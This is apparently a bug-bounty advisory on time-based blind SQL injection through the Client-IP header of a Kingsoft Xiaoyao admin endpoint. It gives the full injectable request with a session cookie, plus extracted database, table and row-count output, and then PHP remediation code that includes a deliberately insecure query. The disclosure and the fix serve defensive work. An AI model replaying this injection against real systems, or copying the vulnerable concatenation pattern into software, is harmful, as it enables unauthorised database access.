Kingsoft Xiaoyao another site Client-IP header MySQL blind Injection
Injection point:
GET /v1/admin/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
X-Requested-With: XMLHttpRequest
Referer: http://xd.team.xoyo.com
Cookie: PHPSESSID=48me9qdk3f10fna9vj5hp6pi73
Host: xd.team.xoyo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
The Client-IP header value (marked with * above) is injectable. The backend is MySQL and the injection is time-based blind.
current user: 'mysql@LOCALHOST'
current database: 'mafcation'

Database: mafcation
[16 tables]
+--------------------+
| languages          |
| m_ace              |
| m_area             |
| m_bulletin         |
| m_cron             |
| m_faction_award    |
| m_faction_role_log |
| m_factionset       |
| m_ip               |
| m_limiting         |
| m_mail             |
| m_name_filter      |
| m_operation_log    |
| m_transfer_captain |
| m_user             |
| m_visitor_count    |
+--------------------+

Database: mafcation
+--------+---------+
| Table  | Entries |
+--------+---------+
| m_user | 6       |
+--------+---------+
Because this is a blind injection, I did not continue to enumerate the user table.
Solution:
Filter and validate the parameter (the Client-IP header value) before it is used in any query.
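To make the fix concrete, here is an added example (not code from the report or from the affected site) of how a PHP backend should handle the Client-IP header before it reaches MySQL. It assumes the value is stored via PDO in a visitor-IP table named m_ip with columns ip and visited_at; those names are assumptions, as is the use of PHP (suggested by the PHPSESSID cookie).

```php
<?php
// Added example, not the vendor's code. Assumes PDO and a table
// m_ip(ip, visited_at); both are assumptions for illustration.

// Return a well-formed IP literal taken from the request, or null.
// Client-IP is attacker-controlled, so it is only ever logged here,
// never used for access control.
function clientIpFromHeaders(array $server): ?string
{
    $raw = $server['HTTP_CLIENT_IP'] ?? $server['REMOTE_ADDR'] ?? '';
    // FILTER_VALIDATE_IP accepts only an IPv4/IPv6 address, so quotes,
    // comments or SQL keywords in the header can never pass through.
    $ip = filter_var(trim($raw), FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

// The pattern the report describes: the header value is concatenated
// into the SQL string, so whatever the client sends becomes query text.
function logVisitInsecure(PDO $db, array $server): void
{
    $ip = $server['HTTP_CLIENT_IP'] ?? '';
    $db->exec("INSERT INTO m_ip (ip, visited_at) VALUES ('$ip', NOW())");
}

// Hardened version: validate first, then bind the value as a parameter
// so it is sent to MySQL as data rather than as part of the statement.
function logVisitSecure(PDO $db, array $server): bool
{
    $ip = clientIpFromHeaders($server);
    if ($ip === null) {
        return false;   // reject malformed input instead of storing it
    }
    $stmt = $db->prepare(
        'INSERT INTO m_ip (ip, visited_at) VALUES (:ip, NOW())'
    );
    return $stmt->execute([':ip' => $ip]);
}

// Constructed sample inputs: one malformed header carrying a quote,
// one well-formed address. The first is rejected, the second accepted.
$malformed = ['HTTP_CLIENT_IP' => "1.2.3.4' x", 'REMOTE_ADDR' => '203.0.113.7'];
$wellFormed = ['HTTP_CLIENT_IP' => '198.51.100.9'];
var_dump(clientIpFromHeaders($malformed));
var_dump(clientIpFromHeaders($wellFormed));
```

Validation on its own is not the whole fix: even a clean-looking value must still be bound as a parameter, since the query text and the data must stay separate.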